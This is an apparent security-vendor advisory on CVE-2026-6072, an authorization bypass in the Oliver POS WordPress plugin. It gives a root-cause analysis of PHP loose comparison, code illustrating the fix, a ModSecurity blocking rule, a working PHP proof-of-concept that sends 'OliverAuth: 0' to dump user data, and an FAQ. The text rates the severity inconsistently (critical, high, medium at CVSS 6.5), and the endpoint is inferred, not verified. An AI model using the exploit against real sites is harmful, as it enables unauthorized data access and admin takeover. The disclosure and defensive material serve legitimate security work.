Atomic Edge analysis of CVE-2026-6072 (metadata-based): This vulnerability allows an unauthenticated attacker to bypass authorization in the Oliver POS plugin for WordPress, affecting all versions up to and including 2.4.2.6. The plugin protects its REST API namespace at /wp-json/pos-bridge/* using the oliver_pos_rest_authentication() permission callback.

Atomic Edge analysis identifies the root cause as a loose PHP comparison (==) in the authentication check. The callback compares the attacker-supplied ‘OliverAuth’ header value against the ‘oliver_pos_authorization_token’ option stored in the WordPress database. On fresh installations where the admin has not completed the connection flow, this option is unset, and get_option() returns false for unset options. Due to PHP’s type juggling, the loose comparison ‘0’ == false evaluates to true. This is inferred from the CWE classification (CWE-639: Authorization Bypass Through User-Controlled Key) and the vulnerability description. Atomic Edge research confirms that no code diff is available for verification, but the described mechanism is a classic PHP loose comparison vulnerability.

The attack vector is straightforward. An attacker sends an HTTP request to any endpoint within /wp-json/pos-bridge/*. The request must include the custom HTTP header ‘OliverAuth: 0’. The attacker does not need authentication credentials and can access any REST API endpoint in that namespace. Specific endpoints within pos-bridge allow reading user data (including administrator details), updating user profiles (including email addresses), and deleting non-admin users. Atomic Edge analysis indicates that an attacker can perform an admin account email reset, leading to site takeover through the ‘lost password’ flow.

Remediation requires changing the PHP comparison from loose (==) to strict (===). The strict comparison ‘0’ === false always returns false, which prevents the bypass. Additionally, the plugin should validate that the oliver_pos_authorization_token option is set before performing any comparison. The fix should be applied in the oliver_pos_rest_authentication() permission callback within the plugin’s REST API registration.

The impact of successful exploitation is critical. An attacker gains full access to all POS API endpoints without authentication. They can extract a list of all users, including administrator accounts with their email addresses and roles. They can modify user profiles, changing email addresses of administrators. This enables a password reset on the administrator account, granting full site takeover. An attacker could also delete non-admin users, causing data loss and service disruption. Atomic Edge research assesses this as a high-severity vulnerability due to the complete authentication bypass and the capability for privilege escalation to site administrator.
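As an added illustration (not the plugin's code and not from the original analysis), the following stand-alone PHP models the permission check described above next to its remediation: a loose comparison against a possibly-unset option beside a hardened check that refuses when no token is provisioned and compares with hash_equals(). get_option() is stubbed so the script runs outside WordPress; the function names, the stub, the constructed token value and the register_rest_route() wiring are assumptions.

```php
<?php
// Added example, not the plugin's code. Stand-alone model of the permission check
// described in the analysis, with a stub of WordPress get_option() so it runs offline.

$wp_options = [];   // constructed state: fresh install, connection flow not completed

// Stub of the WordPress function: returns $default (false) when the option is unset.
function get_option(string $name, $default = false) {
    global $wp_options;
    return array_key_exists($name, $wp_options) ? $wp_options[$name] : $default;
}

// Loose check as the analysis describes it: '0' == false is true under PHP type juggling.
function loose_check(?string $header_value): bool {
    $token = get_option('oliver_pos_authorization_token');
    return $header_value == $token;
}

// Hardened check: refuse when no token is provisioned, require a header to be present,
// and compare with hash_equals() (strict string comparison, constant time).
function strict_check(?string $header_value): bool {
    $token = get_option('oliver_pos_authorization_token');
    if (!is_string($token) || $token === '' || $header_value === null) {
        return false;
    }
    return hash_equals($token, $header_value);
}

// Hypothetical permission_callback wiring for register_rest_route(); WP_REST_Request's
// get_header() returns null when the request carries no OliverAuth header.
function oliver_pos_rest_authentication_fixed($request): bool {
    return strict_check($request->get_header('OliverAuth'));
}

// Walk through the cases from the analysis in both option states.
function report(string $state): void {
    foreach (['0', 'not-the-token'] as $h) {
        printf("%-13s OliverAuth=%-14s loose=%-5s strict=%s\n", $state, $h,
               var_export(loose_check($h), true), var_export(strict_check($h), true));
    }
}
report('option unset');   // loose=true for '0': the bypass; strict=false
$wp_options['oliver_pos_authorization_token'] = 'constructed-token-value';
report('option set');     // loose=false: once the flow completes, '0' no longer matches
```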

CVE-2026-6072: Oliver POS <= 2.4.2.6 – Unauthenticated Authorization Bypass Through User-Controlled Key to 'OliverAuth' Header (oliver-pos)
CVE: CVE-2026-6072
Plugin slug: oliver-pos
Affected versions: <= 2.4.2.6
Analysis Overview
ModSecurity Protection Against This CVE
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-6072 (metadata-based)
# Block unauthenticated access to Oliver POS REST API with 'OliverAuth' header set to '0'
# Phase 1 (request headers): URI in the pos-bridge namespace AND OliverAuth header equal to "0"
SecRule REQUEST_URI "@rx ^/wp-json/pos-bridge/" \
    "id:20266072,phase:1,deny,status:403,chain,msg:'CVE-2026-6072 - Oliver POS Authorization Bypass via OliverAuth:0',severity:'CRITICAL',tag:'CVE-2026-6072'"
    SecRule REQUEST_HEADERS:OliverAuth "@streq 0" "chain"
        # Any standard method: the namespace is reachable regardless of verb
        SecRule REQUEST_METHOD "@rx ^(?:GET|POST|PUT|DELETE|PATCH|OPTIONS)$" "t:none"
Proof of Concept (PHP)
NOTICE:
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================

// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6072 - Oliver POS <= 2.4.2.6 - Unauthenticated Authorization Bypass Through User-Controlled Key to 'OliverAuth' Header

// Configuration: Set the target WordPress site URL
$target_url = 'https://example.com'; // CHANGE THIS to the target site URL

// Initialize cURL
$ch = curl_init();

// Endpoint to get all users (inferred as a typical REST API endpoint in POS plugins)
$endpoint = $target_url . '/wp-json/pos-bridge/v1/users'; // Adjust endpoint as needed based on actual plugin endpoints

// Set headers for the request
$headers = [
    'OliverAuth: 0', // The vulnerable header value to bypass authentication
    'Content-Type: application/json',
    'Accept: application/json',
];

// Configure cURL options
curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing; remove in production with valid SSL

// Execute the request
echo "[+] Sending request to: " . $endpoint . "\n";
echo "[+] Using header: OliverAuth: 0\n\n";
$response  = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($response === false) {
    echo "[!] Error: " . curl_error($ch) . "\n";
} else {
    echo "[+] HTTP Response Code: " . $http_code . "\n\n";
    echo "[+] Response Body:\n";

    // Pretty print JSON if possible (json_decode returns null for non-JSON bodies)
    $decoded = json_decode($response, true);
    if ($decoded !== null) {
        echo json_encode($decoded, JSON_PRETTY_PRINT) . "\n";
    } else {
        echo $response . "\n";
    }

    // Check if we got successful access
    if ($http_code == 200 && $decoded !== null) {
        echo "\n[+] SUCCESS: Authentication bypassed! The plugin returned user data.\n";
        if (isset($decoded[0]['user_email'])) {
            echo "[+] Extracted email: " . $decoded[0]['user_email'] . "\n";
        }
    } elseif ($http_code == 403 || $http_code == 401) {
        echo "\n[-] Failed: Access denied. The target may be patched or the option is set.\n";
    }
}

// Clean up
curl_close($ch);
Frequently Asked Questions
What is CVE-2026-6072?
Overview of the vulnerability
CVE-2026-6072 is a medium severity vulnerability found in the Oliver POS plugin for WordPress, affecting versions up to and including 2.4.2.6. It allows unauthenticated attackers to bypass authorization through a user-controlled key in the ‘OliverAuth’ header, granting access to sensitive REST API endpoints.

How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from a loose PHP comparison in the oliver_pos_rest_authentication() function, where the ‘OliverAuth’ header is compared to an unset option. This allows attackers to send ‘OliverAuth: 0’, which evaluates to true, bypassing authentication and enabling access to the POS API.

Who is affected by this vulnerability?
Identifying impacted users
All users of the Oliver POS plugin for WordPress who are running version 2.4.2.6 or earlier are affected. This includes any WordPress installations that utilize this plugin for point of sale functionality.

How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Oliver POS plugin installed. If it is version 2.4.2.6 or earlier, it is vulnerable. Additionally, you can test the API endpoints to see if the ‘OliverAuth’ header can bypass authentication.

What are the practical risks of this vulnerability?
Understanding the impact
The practical risks include unauthorized access to all POS API endpoints, allowing attackers to read sensitive user data, modify user profiles, and potentially take over administrator accounts. This can lead to data loss and service disruption.

How can I fix this vulnerability?
Mitigation steps
To fix the vulnerability, update the Oliver POS plugin to the latest version that addresses this issue. Additionally, modify the oliver_pos_rest_authentication() function to use strict comparison (===) instead of loose comparison (==) for the ‘OliverAuth’ header.

What does a CVSS score of 6.5 mean?
Interpreting the severity rating
A CVSS score of 6.5 indicates a medium severity vulnerability. This means that while the vulnerability does not pose an immediate critical threat, it can still lead to significant issues if exploited, particularly in the context of unauthorized access.

What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept provided demonstrates how an attacker can use a simple HTTP request with the ‘OliverAuth: 0’ header to access protected API endpoints. This shows the ease of exploitation and the potential for unauthorized access to sensitive information.

What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Oliver POS plugin until a fix can be applied. Additionally, review your site’s security settings and monitor for any suspicious activity.

How can I protect my site from similar vulnerabilities in the future?
Best practices for WordPress security
To protect your site, regularly update all plugins and themes, conduct security audits, and implement security plugins that monitor for vulnerabilities. Additionally, follow best practices for user authentication and authorization.

Is there a way to report this vulnerability?
Responsible disclosure
Yes, if you discover any additional issues or have insights regarding this vulnerability, you can report it to the plugin developers or through a responsible disclosure program. This helps improve the security of the plugin for all users.

Where can I find more information about CVE-2026-6072?
Resources for further reading
More information about CVE-2026-6072 can be found on security databases like the National Vulnerability Database (NVD) or through security research reports published by organizations like Atomic Edge.